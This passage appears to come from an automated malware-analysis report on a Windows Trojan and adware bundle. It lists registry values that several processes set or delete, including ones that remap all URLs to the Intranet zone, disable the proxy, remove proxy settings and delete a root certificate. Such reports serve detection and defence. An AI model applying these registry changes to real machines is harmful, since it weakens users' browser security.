"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\ActSys]
"instid" = "FVz40gdklAiQUMMUD3ARa8NDKI9Pp0VX"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"E9C15E05782C5BADC4287A994D1DDEDB171B8B2A"

The process ActSys.exe:2440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 BC 36 45 A7 A1 90 29 04 1B E2 92 15 F3 1E 25"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 4B 0A E5 61 BA 54 65 0D 62 D2 C3 BD 6C 11 39"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\WNet]
"Version" = "1.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Comments" = "The best offers in internet just one click away from you (ID: HTk3wxj1YXaXLjmPTfdUb6)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"DisplayVersion" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WNet]
"Publisher" = "BR SOFTWARE LLC"
"DisplayName" = "WNet"
"QuietUninstallString" = "%Program Files%\WNet\uninst.exe"
"UninstallString" = "%Program Files%\WNet\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process cmdshell.exe:3548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F CE A6 C2 99 E6 A4 9B 41 99 37 6E 2F D6 4A 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process amisetup5755__9664.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCR\espial.deiform]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}]
"(Default)" = "IBoot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\TypeLib]
"(Default)" = "{89c1a748-b869-4016-8319-4d690ad9fb4a}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\VersionIndependentProgID]
"(Default)" = "espial.deiform"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCR\espial.deiform.1\CLSID]
"(Default)" = "{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}"

[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]
"(Default)" = "{89C1A748-B869-4016-8319-4D690AD9FB4A}"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\espial.deiform.1]
"(Default)" = "Inst Class"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Version]
"(Default)" = "1.0"

[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0]
"(Default)" = "InstallerLib"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1429772524"

[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}]
"(Default)" = "Inst Class"

[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "37 CA 87 11 14 2E 2D 07 1C 5A 41 3E 05 2D 8C 64"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup5755__9664.exe"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup5755__9664\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\amisetup5755__9664.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\ProgID]
"(Default)" = "espial.deiform.1"

[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\espial.deiform\CurVer]
"(Default)" = "espial.deiform.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\VersionIndependentProgID]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid32]
[HKCR\espial.deiform.1]
[HKCR\espial.deiform\CurVer]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0\win32]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\0]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\FLAGS]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}\1.0\HELPDIR]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\ProxyStubClsid]
[HKCR\espial.deiform.1\CLSID]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Programmable]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
[HKCR\TypeLib\{89C1A748-B869-4016-8319-4D690AD9FB4A}]
[HKCR\espial.deiform]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\ProgID]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\Version]
[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\TypeLib]
[HKCR\Interface\{AF6C5755-2284-45AB-B8B3-367315BFC95D}\TypeLib]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKCR\CLSID\{57b7a1bf-4c73-4f0a-a5b5-b6bd56cdb68b}\LocalServer32]
"ServerExecutable"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisetup5755__9664\DEBUG]
"Trace Level"

The process nfregdrv.exe:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 2D A1 B6 B6 CA 07 B2 99 CE D4 A8 0D 24 2A C5"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0B 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

The process nfregdrv.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC B8 71 18 71 E6 BE 5D 5D 3B 37 A7 5B 5E C1 72"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

The process %original file name%.exe:1396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 9A DA 6E 4F 35 B6 2A A8 D8 19 6A D6 1E 73 9B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp]
"QQBrowser.exe" = "QQ浏览器"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 D8 12 C4 55 2B 78 AC 9B 09 50 FE EC 40 EE 4A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process CashReminder.exe:1232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
